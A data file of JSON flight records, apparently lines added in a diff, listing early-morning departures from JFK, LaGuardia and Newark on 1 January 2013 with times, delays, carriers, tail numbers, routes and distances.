+{"year":2013,"month":1,"day":1,"dep_time":558,"sched_dep_time":600,"dep_delay":-2,"arr_time":753,"sched_arr_time":745,"arr_delay":8,"carrier":"AA","flight":301,"tailnum":"N3ALAA","origin":"LGA","dest":"ORD","air_time":138,"distance":733,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":558,"sched_dep_time":600,"dep_delay":-2,"arr_time":849,"sched_arr_time":851,"arr_delay":-2,"carrier":"B6","flight":49,"tailnum":"N793JB","origin":"JFK","dest":"PBI","air_time":149,"distance":1028,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":558,"sched_dep_time":600,"dep_delay":-2,"arr_time":853,"sched_arr_time":856,"arr_delay":-3,"carrier":"B6","flight":71,"tailnum":"N657JB","origin":"JFK","dest":"TPA","air_time":158,"distance":1005,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":558,"sched_dep_time":600,"dep_delay":-2,"arr_time":924,"sched_arr_time":917,"arr_delay":7,"carrier":"UA","flight":194,"tailnum":"N29129","origin":"JFK","dest":"LAX","air_time":345,"distance":2475,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":558,"sched_dep_time":600,"dep_delay":-2,"arr_time":923,"sched_arr_time":937,"arr_delay":-14,"carrier":"UA","flight":1124,"tailnum":"N53441","origin":"EWR","dest":"SFO","air_time":361,"distance":2565,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":559,"sched_dep_time":600,"dep_delay":-1,"arr_time":941,"sched_arr_time":910,"arr_delay":31,"carrier":"AA","flight":707,"tailnum":"N3DUAA","origin":"LGA","dest":"DFW","air_time":257,"distance":1389,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":559,"sched_dep_time":559,"dep_delay":0,"arr_time":702,"sched_arr_time":706,"arr_delay":-4,"carrier":"B6","flight":1806,"tailnum":"N708JB","origin":"JFK","dest":"BOS","air_time":44,"distance":187,"hour":5,"minute":59,"time_hour":"2013-01-01 05:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":559,"sched_dep_time":600,"dep_delay":-1,"arr_time":854,"sched_arr_time":902,"arr_delay":-8,"carrier":"UA","flight":1187,"tailnum":"N76515","origin":"EWR","dest":"LAS","air_time":337,"distance":2227,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":600,"sched_dep_time":600,"dep_delay":0,"arr_time":851,"sched_arr_time":858,"arr_delay":-7,"carrier":"B6","flight":371,"tailnum":"N595JB","origin":"LGA","dest":"FLL","air_time":152,"distance":1076,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":600,"sched_dep_time":600,"dep_delay":0,"arr_time":837,"sched_arr_time":825,"arr_delay":12,"carrier":"MQ","flight":4650,"tailnum":"N542MQ","origin":"LGA","dest":"ATL","air_time":134,"distance":762,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":601,"sched_dep_time":600,"dep_delay":1,"arr_time":844,"sched_arr_time":850,"arr_delay":-6,"carrier":"B6","flight":343,"tailnum":"N644JB","origin":"EWR","dest":"PBI","air_time":147,"distance":1023,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":602,"sched_dep_time":610,"dep_delay":-8,"arr_time":812,"sched_arr_time":820,"arr_delay":-8,"carrier":"DL","flight":1919,"tailnum":"N971DL","origin":"LGA","dest":"MSP","air_time":170,"distance":1020,"hour":6,"minute":10,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":602,"sched_dep_time":605,"dep_delay":-3,"arr_time":821,"sched_arr_time":805,"arr_delay":16,"carrier":"MQ","flight":4401,"tailnum":"N730MQ","origin":"LGA","dest":"DTW","air_time":105,"distance":502,"hour":6,"minute":5,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":606,"sched_dep_time":610,"dep_delay":-4,"arr_time":858,"sched_arr_time":910,"arr_delay":-12,"carrier":"AA","flight":1895,"tailnum":"N633AA","origin":"EWR","dest":"MIA","air_time":152,"distance":1085,"hour":6,"minute":10,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":606,"sched_dep_time":610,"dep_delay":-4,"arr_time":837,"sched_arr_time":845,"arr_delay":-8,"carrier":"DL","flight":1743,"tailnum":"N3739P","origin":"JFK","dest":"ATL","air_time":128,"distance":760,"hour":6,"minute":10,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":607,"sched_dep_time":607,"dep_delay":0,"arr_time":858,"sched_arr_time":915,"arr_delay":-17,"carrier":"UA","flight":1077,"tailnum":"N53442","origin":"EWR","dest":"MIA","air_time":157,"distance":1085,"hour":6,"minute":7,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":608,"sched_dep_time":600,"dep_delay":8,"arr_time":807,"sched_arr_time":735,"arr_delay":32,"carrier":"MQ","flight":3768,"tailnum":"N9EAMQ","origin":"EWR","dest":"ORD","air_time":139,"distance":719,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":611,"sched_dep_time":600,"dep_delay":11,"arr_time":945,"sched_arr_time":931,"arr_delay":14,"carrier":"UA","flight":303,"tailnum":"N532UA","origin":"JFK","dest":"SFO","air_time":366,"distance":2586,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":613,"sched_dep_time":610,"dep_delay":3,"arr_time":925,"sched_arr_time":921,"arr_delay":4,"carrier":"B6","flight":135,"tailnum":"N635JB","origin":"JFK","dest":"RSW","air_time":175,"distance":1074,"hour":6,"minute":10,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":615,"sched_dep_time":615,"dep_delay":0,"arr_time":1039,"sched_arr_time":1100,"arr_delay":-21,"carrier":"B6","flight":709,"tailnum":"N794JB","origin":"JFK","dest":"SJU","air_time":182,"distance":1598,"hour":6,"minute":15,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":615,"sched_dep_time":615,"dep_delay":0,"arr_time":833,"sched_arr_time":842,"arr_delay":-9,"carrier":"DL","flight":575,"tailnum":"N326NB","origin":"EWR","dest":"ATL","air_time":120,"distance":746,"hour":6,"minute":15,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":622,"sched_dep_time":630,"dep_delay":-8,"arr_time":1017,"sched_arr_time":1014,"arr_delay":3,"carrier":"US","flight":245,"tailnum":"N807AW","origin":"EWR","dest":"PHX","air_time":342,"distance":2133,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":623,"sched_dep_time":610,"dep_delay":13,"arr_time":920,"sched_arr_time":915,"arr_delay":5,"carrier":"AA","flight":1837,"tailnum":"N3EMAA","origin":"LGA","dest":"MIA","air_time":153,"distance":1096,"hour":6,"minute":10,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":623,"sched_dep_time":627,"dep_delay":-4,"arr_time":933,"sched_arr_time":932,"arr_delay":1,"carrier":"UA","flight":496,"tailnum":"N459UA","origin":"LGA","dest":"IAH","air_time":229,"distance":1416,"hour":6,"minute":27,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":624,"sched_dep_time":630,"dep_delay":-6,"arr_time":909,"sched_arr_time":840,"arr_delay":29,"carrier":"EV","flight":4626,"tailnum":"N11107","origin":"EWR","dest":"MSP","air_time":190,"distance":1008,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":624,"sched_dep_time":630,"dep_delay":-6,"arr_time":840,"sched_arr_time":830,"arr_delay":10,"carrier":"MQ","flight":4599,"tailnum":"N518MQ","origin":"LGA","dest":"MSP","air_time":166,"distance":1020,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":627,"sched_dep_time":630,"dep_delay":-3,"arr_time":1018,"sched_arr_time":1018,"arr_delay":0,"carrier":"US","flight":27,"tailnum":"N535UW","origin":"JFK","dest":"PHX","air_time":330,"distance":2153,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":628,"sched_dep_time":630,"dep_delay":-2,"arr_time":1137,"sched_arr_time":1140,"arr_delay":-3,"carrier":"AA","flight":413,"tailnum":"N3BAAA","origin":"JFK","dest":"SJU","air_time":192,"distance":1598,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":628,"sched_dep_time":630,"dep_delay":-2,"arr_time":1016,"sched_arr_time":947,"arr_delay":29,"carrier":"UA","flight":1665,"tailnum":"N33289","origin":"EWR","dest":"LAX","air_time":366,"distance":2454,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":629,"sched_dep_time":630,"dep_delay":-1,"arr_time":824,"sched_arr_time":810,"arr_delay":14,"carrier":"AA","flight":303,"tailnum":"N3CYAA","origin":"LGA","dest":"ORD","air_time":140,"distance":733,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":629,"sched_dep_time":630,"dep_delay":-1,"arr_time":721,"sched_arr_time":740,"arr_delay":-19,"carrier":"WN","flight":4646,"tailnum":"N273WN","origin":"LGA","dest":"BWI","air_time":40,"distance":185,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":629,"sched_dep_time":630,"dep_delay":-1,"arr_time":824,"sched_arr_time":833,"arr_delay":-9,"carrier":"US","flight":1019,"tailnum":"N426US","origin":"EWR","dest":"CLT","air_time":91,"distance":529,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":632,"sched_dep_time":608,"dep_delay":24,"arr_time":740,"sched_arr_time":728,"arr_delay":12,"carrier":"EV","flight":4144,"tailnum":"N13553","origin":"EWR","dest":"IAD","air_time":52,"distance":212,"hour":6,"minute":8,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":635,"sched_dep_time":635,"dep_delay":0,"arr_time":1028,"sched_arr_time":940,"arr_delay":48,"carrier":"AA","flight":711,"tailnum":"N3GKAA","origin":"LGA","dest":"DFW","air_time":248,"distance":1389,"hour":6,"minute":35,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":637,"sched_dep_time":645,"dep_delay":-8,"arr_time":930,"sched_arr_time":935,"arr_delay":-5,"carrier":"B6","flight":389,"tailnum":"N709JB","origin":"LGA","dest":"MCO","air_time":144,"distance":950,"hour":6,"minute":45,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":639,"sched_dep_time":640,"dep_delay":-1,"arr_time":739,"sched_arr_time":749,"arr_delay":-10,"carrier":"B6","flight":1002,"tailnum":"N805JB","origin":"JFK","dest":"BOS","air_time":41,"distance":187,"hour":6,"minute":40,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":643,"sched_dep_time":646,"dep_delay":-3,"arr_time":922,"sched_arr_time":940,"arr_delay":-18,"carrier":"UA","flight":556,"tailnum":"N497UA","origin":"EWR","dest":"PBI","air_time":146,"distance":1023,"hour":6,"minute":46,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":643,"sched_dep_time":645,"dep_delay":-2,"arr_time":837,"sched_arr_time":848,"arr_delay":-11,"carrier":"US","flight":926,"tailnum":"N178US","origin":"EWR","dest":"CLT","air_time":91,"distance":529,"hour":6,"minute":45,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":644,"sched_dep_time":636,"dep_delay":8,"arr_time":931,"sched_arr_time":940,"arr_delay":-9,"carrier":"UA","flight":1701,"tailnum":"N75435","origin":"EWR","dest":"FLL","air_time":151,"distance":1065,"hour":6,"minute":36,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":645,"sched_dep_time":647,"dep_delay":-2,"arr_time":815,"sched_arr_time":810,"arr_delay":5,"carrier":"B6","flight":102,"tailnum":"N796JB","origin":"JFK","dest":"BUF","air_time":63,"distance":301,"hour":6,"minute":47,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":646,"sched_dep_time":645,"dep_delay":1,"arr_time":910,"sched_arr_time":916,"arr_delay":-6,"carrier":"UA","flight":883,"tailnum":"N569UA","origin":"LGA","dest":"DEN","air_time":243,"distance":1620,"hour":6,"minute":45,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":646,"sched_dep_time":645,"dep_delay":1,"arr_time":1023,"sched_arr_time":1030,"arr_delay":-7,"carrier":"UA","flight":1496,"tailnum":"N38727","origin":"EWR","dest":"SNA","air_time":380,"distance":2434,"hour":6,"minute":45,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":651,"sched_dep_time":655,"dep_delay":-4,"arr_time":936,"sched_arr_time":942,"arr_delay":-6,"carrier":"B6","flight":203,"tailnum":"N558JB","origin":"JFK","dest":"LAS","air_time":323,"distance":2248,"hour":6,"minute":55,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":652,"sched_dep_time":655,"dep_delay":-3,"arr_time":932,"sched_arr_time":921,"arr_delay":11,"carrier":"B6","flight":117,"tailnum":"N178JB","origin":"JFK","dest":"MSY","air_time":191,"distance":1182,"hour":6,"minute":55,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":653,"sched_dep_time":700,"dep_delay":-7,"arr_time":936,"sched_arr_time":1009,"arr_delay":-33,"carrier":"DL","flight":1383,"tailnum":"N327NW","origin":"LGA","dest":"PBI","air_time":149,"distance":1035,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":655,"sched_dep_time":655,"dep_delay":0,"arr_time":1021,"sched_arr_time":1030,"arr_delay":-9,"carrier":"DL","flight":1415,"tailnum":"N3763D","origin":"JFK","dest":"SLC","air_time":294,"distance":1990,"hour":6,"minute":55,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":655,"sched_dep_time":700,"dep_delay":-5,"arr_time":1037,"sched_arr_time":1045,"arr_delay":-8,"carrier":"DL","flight":1865,"tailnum":"N705TW","origin":"JFK","dest":"SFO","air_time":362,"distance":2586,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":655,"sched_dep_time":700,"dep_delay":-5,"arr_time":1002,"sched_arr_time":1020,"arr_delay":-18,"carrier":"DL","flight":2003,"tailnum":"N997DL","origin":"LGA","dest":"MIA","air_time":161,"distance":1096,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":656,"sched_dep_time":700,"dep_delay":-4,"arr_time":854,"sched_arr_time":850,"arr_delay":4,"carrier":"AA","flight":305,"tailnum":"N4WNAA","origin":"LGA","dest":"ORD","air_time":143,"distance":733,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":656,"sched_dep_time":659,"dep_delay":-3,"arr_time":949,"sched_arr_time":959,"arr_delay":-10,"carrier":"AA","flight":1815,"tailnum":"N5FMAA","origin":"JFK","dest":"MCO","air_time":142,"distance":944,"hour":6,"minute":59,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":656,"sched_dep_time":705,"dep_delay":-9,"arr_time":1007,"sched_arr_time":940,"arr_delay":27,"carrier":"MQ","flight":4534,"tailnum":"N722MQ","origin":"LGA","dest":"XNA","air_time":233,"distance":1147,"hour":7,"minute":5,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":656,"sched_dep_time":700,"dep_delay":-4,"arr_time":948,"sched_arr_time":1011,"arr_delay":-23,"carrier":"UA","flight":1115,"tailnum":"N24212","origin":"EWR","dest":"TPA","air_time":156,"distance":997,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":657,"sched_dep_time":700,"dep_delay":-3,"arr_time":959,"sched_arr_time":1013,"arr_delay":-14,"carrier":"DL","flight":1879,"tailnum":"N318NB","origin":"LGA","dest":"FLL","air_time":164,"distance":1076,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":658,"sched_dep_time":700,"dep_delay":-2,"arr_time":944,"sched_arr_time":939,"arr_delay":5,"carrier":"DL","flight":1547,"tailnum":"N6703D","origin":"LGA","dest":"ATL","air_time":126,"distance":762,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":658,"sched_dep_time":700,"dep_delay":-2,"arr_time":1027,"sched_arr_time":1025,"arr_delay":2,"carrier":"VX","flight":399,"tailnum":"N627VA","origin":"JFK","dest":"LAX","air_time":361,"distance":2475,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":659,"sched_dep_time":700,"dep_delay":-1,"arr_time":1008,"sched_arr_time":1015,"arr_delay":-7,"carrier":"AA","flight":2279,"tailnum":"N3EKAA","origin":"LGA","dest":"MIA","air_time":159,"distance":1096,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":659,"sched_dep_time":700,"dep_delay":-1,"arr_time":1008,"sched_arr_time":1007,"arr_delay":1,"carrier":"B6","flight":981,"tailnum":"N646JB","origin":"JFK","dest":"FLL","air_time":156,"distance":1069,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":659,"sched_dep_time":705,"dep_delay":-6,"arr_time":907,"sched_arr_time":913,"arr_delay":-6,"carrier":"DL","flight":831,"tailnum":"N998DL","origin":"LGA","dest":"DTW","air_time":105,"distance":502,"hour":7,"minute":5,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":659,"sched_dep_time":700,"dep_delay":-1,"arr_time":959,"sched_arr_time":1008,"arr_delay":-9,"carrier":"UA","flight":960,"tailnum":"N838UA","origin":"EWR","dest":"RSW","air_time":164,"distance":1068,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":701,"sched_dep_time":700,"dep_delay":1,"arr_time":1123,"sched_arr_time":1154,"arr_delay":-31,"carrier":"UA","flight":1203,"tailnum":"N77296","origin":"EWR","dest":"SJU","air_time":188,"distance":1608,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":702,"sched_dep_time":700,"dep_delay":2,"arr_time":1058,"sched_arr_time":1014,"arr_delay":44,"carrier":"B6","flight":671,"tailnum":"N779JB","origin":"JFK","dest":"LAX","air_time":381,"distance":2475,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":709,"sched_dep_time":700,"dep_delay":9,"arr_time":852,"sched_arr_time":832,"arr_delay":20,"carrier":"UA","flight":1092,"tailnum":"N26226","origin":"LGA","dest":"ORD","air_time":135,"distance":733,"hour":7,"minute":0,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":711,"sched_dep_time":715,"dep_delay":-4,"arr_time":1151,"sched_arr_time":1206,"arr_delay":-15,"carrier":"B6","flight":715,"tailnum":"N651JB","origin":"JFK","dest":"SJU","air_time":190,"distance":1598,"hour":7,"minute":15,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":712,"sched_dep_time":715,"dep_delay":-3,"arr_time":1023,"sched_arr_time":1035,"arr_delay":-12,"carrier":"AA","flight":825,"tailnum":"N3ETAA","origin":"JFK","dest":"FLL","air_time":159,"distance":1069,"hour":7,"minute":15,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":715,"sched_dep_time":713,"dep_delay":2,"arr_time":911,"sched_arr_time":850,"arr_delay":21,"carrier":"UA","flight":544,"tailnum":"N841UA","origin":"EWR","dest":"ORD","air_time":156,"distance":719,"hour":7,"minute":13,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":717,"sched_dep_time":720,"dep_delay":-3,"arr_time":850,"sched_arr_time":840,"arr_delay":10,"carrier":"FL","flight":850,"tailnum":"N978AT","origin":"LGA","dest":"MKE","air_time":134,"distance":738,"hour":7,"minute":20,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":719,"sched_dep_time":721,"dep_delay":-2,"arr_time":1017,"sched_arr_time":1012,"arr_delay":5,"carrier":"B6","flight":987,"tailnum":"N562JB","origin":"JFK","dest":"MCO","air_time":147,"distance":944,"hour":7,"minute":21,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":723,"sched_dep_time":725,"dep_delay":-2,"arr_time":1013,"sched_arr_time":1017,"arr_delay":-4,"carrier":"UA","flight":962,"tailnum":"N514UA","origin":"EWR","dest":"PBI","air_time":153,"distance":1023,"hour":7,"minute":25,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":724,"sched_dep_time":730,"dep_delay":-6,"arr_time":1111,"sched_arr_time":1040,"arr_delay":31,"carrier":"AA","flight":715,"tailnum":"N541AA","origin":"LGA","dest":"DFW","air_time":254,"distance":1389,"hour":7,"minute":30,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":724,"sched_dep_time":725,"dep_delay":-1,"arr_time":1020,"sched_arr_time":1030,"arr_delay":-10,"carrier":"AS","flight":11,"tailnum":"N594AS","origin":"EWR","dest":"SEA","air_time":338,"distance":2402,"hour":7,"minute":25,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":725,"sched_dep_time":730,"dep_delay":-5,"arr_time":1052,"sched_arr_time":1040,"arr_delay":12,"carrier":"AA","flight":2083,"tailnum":"N4WRAA","origin":"EWR","dest":"DFW","air_time":238,"distance":1372,"hour":7,"minute":30,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":727,"sched_dep_time":730,"dep_delay":-3,"arr_time":959,"sched_arr_time":952,"arr_delay":7,"carrier":"UA","flight":1162,"tailnum":"N37462","origin":"EWR","dest":"DEN","air_time":254,"distance":1605,"hour":7,"minute":30,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":728,"sched_dep_time":732,"dep_delay":-4,"arr_time":1041,"sched_arr_time":1038,"arr_delay":3,"carrier":"UA","flight":473,"tailnum":"N488UA","origin":"LGA","dest":"IAH","air_time":238,"distance":1416,"hour":7,"minute":32,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":729,"sched_dep_time":730,"dep_delay":-1,"arr_time":1049,"sched_arr_time":1115,"arr_delay":-26,"carrier":"VX","flight":11,"tailnum":"N635VA","origin":"JFK","dest":"SFO","air_time":356,"distance":2586,"hour":7,"minute":30,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":732,"sched_dep_time":735,"dep_delay":-3,"arr_time":857,"sched_arr_time":858,"arr_delay":-1,"carrier":"B6","flight":20,"tailnum":"N304JB","origin":"JFK","dest":"ROC","air_time":64,"distance":264,"hour":7,"minute":35,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":732,"sched_dep_time":729,"dep_delay":3,"arr_time":1041,"sched_arr_time":1039,"arr_delay":2,"carrier":"B6","flight":1601,"tailnum":"N563JB","origin":"LGA","dest":"RSW","air_time":167,"distance":1080,"hour":7,"minute":29,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":732,"sched_dep_time":645,"dep_delay":47,"arr_time":1011,"sched_arr_time":941,"arr_delay":30,"carrier":"UA","flight":1111,"tailnum":"N37456","origin":"EWR","dest":"MCO","air_time":145,"distance":937,"hour":6,"minute":45,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":733,"sched_dep_time":736,"dep_delay":-3,"arr_time":854,"sched_arr_time":850,"arr_delay":4,"carrier":"B6","flight":44,"tailnum":"N552JB","origin":"JFK","dest":"SYR","air_time":54,"distance":209,"hour":7,"minute":36,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":734,"sched_dep_time":737,"dep_delay":-3,"arr_time":1047,"sched_arr_time":1113,"arr_delay":-26,"carrier":"B6","flight":643,"tailnum":"N625JB","origin":"JFK","dest":"SFO","air_time":350,"distance":2586,"hour":7,"minute":37,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":739,"sched_dep_time":745,"dep_delay":-6,"arr_time":918,"sched_arr_time":930,"arr_delay":-12,"carrier":"AA","flight":309,"tailnum":"N4WPAA","origin":"LGA","dest":"ORD","air_time":137,"distance":733,"hour":7,"minute":45,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":739,"sched_dep_time":739,"dep_delay":0,"arr_time":1104,"sched_arr_time":1038,"arr_delay":26,"carrier":"UA","flight":1479,"tailnum":"N37408","origin":"EWR","dest":"IAH","air_time":249,"distance":1400,"hour":7,"minute":39,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":741,"sched_dep_time":745,"dep_delay":-4,"arr_time":1038,"sched_arr_time":1036,"arr_delay":2,"carrier":"B6","flight":983,"tailnum":"N633JB","origin":"LGA","dest":"TPA","air_time":158,"distance":1010,"hour":7,"minute":45,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":743,"sched_dep_time":730,"dep_delay":13,"arr_time":1107,"sched_arr_time":1100,"arr_delay":7,"carrier":"AA","flight":33,"tailnum":"N338AA","origin":"JFK","dest":"LAX","air_time":358,"distance":2475,"hour":7,"minute":30,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":743,"sched_dep_time":749,"dep_delay":-6,"arr_time":1043,"sched_arr_time":1054,"arr_delay":-11,"carrier":"B6","flight":341,"tailnum":"N624JB","origin":"JFK","dest":"SRQ","air_time":164,"distance":1041,"hour":7,"minute":49,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":743,"sched_dep_time":730,"dep_delay":13,"arr_time":1059,"sched_arr_time":1056,"arr_delay":3,"carrier":"DL","flight":495,"tailnum":"N3760C","origin":"JFK","dest":"SEA","air_time":349,"distance":2422,"hour":7,"minute":30,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":745,"sched_dep_time":745,"dep_delay":0,"arr_time":1135,"sched_arr_time":1125,"arr_delay":10,"carrier":"AA","flight":59,"tailnum":"N336AA","origin":"JFK","dest":"SFO","air_time":378,"distance":2586,"hour":7,"minute":45,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":746,"sched_dep_time":746,"dep_delay":0,"arr_time":1119,"sched_arr_time":1129,"arr_delay":-10,"carrier":"UA","flight":1668,"tailnum":"N24224","origin":"EWR","dest":"SFO","air_time":373,"distance":2565,"hour":7,"minute":46,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":749,"sched_dep_time":710,"dep_delay":39,"arr_time":939,"sched_arr_time":850,"arr_delay":49,"carrier":"MQ","flight":3737,"tailnum":"N508MQ","origin":"EWR","dest":"ORD","air_time":148,"distance":719,"hour":7,"minute":10,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":752,"sched_dep_time":755,"dep_delay":-3,"arr_time":1041,"sched_arr_time":1059,"arr_delay":-18,"carrier":"DL","flight":2263,"tailnum":"N325US","origin":"LGA","dest":"MCO","air_time":140,"distance":950,"hour":7,"minute":55,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":752,"sched_dep_time":750,"dep_delay":2,"arr_time":1025,"sched_arr_time":1029,"arr_delay":-4,"carrier":"UA","flight":477,"tailnum":"N511UA","origin":"LGA","dest":"DEN","air_time":249,"distance":1620,"hour":7,"minute":50,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":752,"sched_dep_time":759,"dep_delay":-7,"arr_time":955,"sched_arr_time":959,"arr_delay":-4,"carrier":"US","flight":1733,"tailnum":"N543UW","origin":"LGA","dest":"CLT","air_time":96,"distance":544,"hour":7,"minute":59,"time_hour":"2013-01-01 07:00:00"} 